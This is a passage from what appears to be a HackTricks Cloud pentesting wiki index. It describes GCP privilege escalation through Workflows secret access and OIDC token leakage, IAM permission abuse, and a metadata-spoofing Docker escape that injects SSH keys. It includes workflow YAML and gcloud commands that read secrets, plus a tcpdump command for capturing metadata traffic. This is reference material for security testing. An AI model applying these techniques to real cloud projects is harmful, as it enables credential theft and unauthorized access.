GCP - Storage Privesc » GCR","id":"1131","title":"GCR"},"1132":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:~:text=apiKeys.-,create,privileges%20than%20our%20own%20user. tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » References","id":"1132","title":"References"},"1133":{"body":"Reading time: 4 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » GCP - Workflows Privesc","id":"1133","title":"GCP - Workflows Privesc"},"1134":{"body":"Basic Information: GCP - Workflows Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » Workflows","id":"1134","title":"Workflows"},"1135":{"body":"Afaik it\'s not possible to get a shell with access to the metadata endpoint containing the SA credentials of the SA attacked to a Workflow. However, it\'s possible to abuse the permissions of the SA by adding the actions to perform inside the Workflow. It\'s possible to find the documentation of the connectors. For example, this is the page of the Secretmanager connector . In the side bar it\'s possible to find several other connectors. And here you can find an example of a connector that prints a secret: yaml main: params: [input] steps: - access_string_secret: call: googleapis.secretmanager.v1.projects.secrets.versions.accessString args: secret_id: secret_name version: 1 project_id: project-id result: str_secret - returnOutput: return: \\"${str_secret}\\" Update from the CLI: bash gcloud workflows deploy \\\\ --service-account=email@SA \\\\ --source=/path/to/config.yaml \\\\ --location us-central1 If you get an error like ERROR: (gcloud.workflows.deploy) FAILED_PRECONDITION: Workflows service agent does not exist, just wait a minute and try again . If you don\'t have web access it\'s possible to trigger and see the execution of a Workflow with: bash # Run execution with output\\ngcloud workflows run --location us-central1 # Run execution without output\\ngcloud workflows execute --location us-central1 # List executions\\ngcloud workflows executions list # Get execution info and output\\ngcloud workflows executions describe projects//locations//workflows//executions/ caution You can also check the output of previous executions to look for sensitive information Note that even if you get an error like PERMISSION_DENIED: Permission \'workflows.operations.get\' denied on... because you don\'t have that permission, the workflow has been generated.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)","id":"1135","title":"workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)"},"1136":{"body":"According to the docs it\'s possible to use workflow steps that will send an HTTP request with the OAuth or OIDC token. However, just like in the case of Cloud Scheduler , the HTTP request with the Oauth token must be to the host .googleapis.com. caution Therefore, it\'s possible to leak the OIDC token by indicating a HTTP endpoint controlled by the user but to leak the OAuth token you would need a bypass for that protection. However, you are still able to contact any GCP api to perform actions on behalf the SA using either connectors or HTTP requests with the OAuth token. Oauth yaml - step_A: call: http.post args: url: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop auth: type: OAuth2 scopes: OAUTH_SCOPE OIDC yaml - step_A: call: http.get args: url: https://us-central1-project.cloudfunctions.net/functionA query: firstNumber: 4 secondNumber: 6 operation: sum auth: type: OIDC audience: OIDC_AUDIENCE","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » Leak OIDC token (and OAuth?)","id":"1136","title":"Leak OIDC token (and OAuth?)"},"1137":{"body":"With this permission instead of workflows.workflows.create it\'s possible to update an already existing workflow and perform the same attacks. tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » workflows.workflows.update ...","id":"1137","title":"workflows.workflows.update ..."},"1138":{"body":"Reading time: 2 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » GCP - Generic Permissions Privesc","id":"1138","title":"GCP - Generic Permissions Privesc"},"1139":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » Generic Interesting Permissions","id":"1139","title":"Generic Interesting Permissions"},"114":{"body":"Github applications can ask for permissions to access your github information or impersonate you to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to. To install a GitHub App, you must be an organisation owner or have admin permissions in a repository. The GitHub App should connect to a personal account or an organisation . You can create your own Github application in https://github.com/settings/apps You can see all the Github applications that has access to your account in https://github.com/settings/apps/authorizations These are the API Endpoints for Github Applications https://docs.github.com/en/rest/overview/endpoints-available-for-github-app . Depending on the permissions of the App it will be able to access some of them You can see installed apps in an organization in https://github.com/organizations//settings/installations Some security recommendations: A GitHub App should take actions independent of a user (unless the app is using a user-to-server token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see \\" Refreshing user-to-server access tokens .\\" Make sure the GitHub App integrates with specific repositories . The GitHub App should connect to a personal account or an organisation . Don\'t expect the GitHub App to know and do everything a user can. Don\'t use a GitHub App if you just need a \\"Login with GitHub\\" service . But a GitHub App can use a user identification flow to log users in and do other things. Don\'t build a GitHub App if you only want to act as a GitHub user and do everything that user can do. If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the workflow scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see \\" Understanding scopes for OAuth apps .\\" More in here .","breadcrumbs":"Github Security » Basic Github Information » Github Applications","id":"114","title":"Github Applications"},"1140":{"body":"If you owns a user that has the setIamPolicy permission in a resource you can escalate privileges in that resource because you will be able to change the IAM policy of that resource and give you more privileges over it. This permission can also allow to escalate to other principals if the resource allow to execute code and the iam.ServiceAccounts.actAs is not necessary. cloudfunctions.functions.setIamPolicy Modify the policy of a Cloud Function to allow yourself to invoke it. There are tens of resources types with this kind of permission, you can find all of them in https://cloud.google.com/iam/docs/permissions-reference searching for setIamPolicy.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *.setIamPolicy","id":"1140","title":"*.setIamPolicy"},"1141":{"body":"These permissions can be very useful to try to escalate privileges in resources by creating a new one or updating a new one . These can of permissions are specially useful if you also has the permission iam.serviceAccounts.actAs over a Service Account and the resource you have .create/.update over can attach a service account.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *.create, *.update","id":"1141","title":"*.create, *.update"},"1142":{"body":"This permission will usually let you access or modify a Service Account in some resource (e.g.: compute.instances.setServiceAccount). This could lead to a privilege escalation vector, but it will depend on each case. tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *ServiceAccount*","id":"1142","title":"*ServiceAccount*"},"1143":{"body":"Reading time: 4 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » GCP - Network Docker Escape","id":"1143","title":"GCP - Network Docker Escape"},"1144":{"body":"In both writeups where this technique is specified, the attackers managed to get root access inside a Docker container managed by GCP with access to the host network (and the capabilities CAP_NET_ADMIN and CAP_NET_RAW ).","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » Initial State","id":"1144","title":"Initial State"},"1145":{"body":"On a Google Compute Engine instance, regular inspection of network traffic reveals numerous plain HTTP requests to the metadata instance at 169.254.169.254. The Google Guest Agent , an open-source service, frequently makes such requests. This agent is designed to monitor changes in the metadata . Notably, the metadata includes a field for SSH public keys . When a new public SSH key is added to the metadata, the agent automatically authorizes it in the .authorized_key file. It may also create a new user and add them to sudoers if needed. The agent monitors changes by sending a request to retrieve all metadata values recursively (GET /computeMetadata/v1/?recursive=true). This request is designed to prompt the metadata server to send a response only if there\'s any change in the metadata since the last retrieval, identified by an Etag (wait_for_change=true&last_etag=). Additionally, a timeout parameter (timeout_sec=) is included. If no change occurs within the specified timeout, the server responds with the unchanged values . This process allows the IMDS (Instance Metadata Service) to respond after 60 seconds if no configuration change has occurred, creating a potential window for injecting a fake configuration response to the guest agent. An attacker could exploit this by performing a Man-in-the-Middle (MitM) attack , spoofing the response from the IMDS server and inserting a new public key . This could enable unauthorized SSH access to the host.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » Attack Explanation","id":"1145","title":"Attack Explanation"},"1146":{"body":"While ARP spoofing is ineffective on Google Compute Engine networks, a modified version of rshijack developed by Ezequiel can be used for packet injection in the communication to inject the SSH user. This version of rshijack allows inputting the ACK and SEQ numbers as command-line arguments, facilitating the spoofing of a response before the real Metadata server response. Additionally, a small Shell script is used to return a specially crafted payload . This payload triggers the Google Guest Agent to create a user wouter with a specified public key in the .authorized_keys file. The script uses the same ETag to prevent the Metadata server from immediately notifying the Google Guest Agent of different metadata values, thereby delaying the response. To execute the spoofing, the following steps are necessary: Monitor requests to the Metadata server using tcpdump : bash tcpdump -S -i eth0 \'host 169.254.169.254 and port 80\' & Look for a line similar to: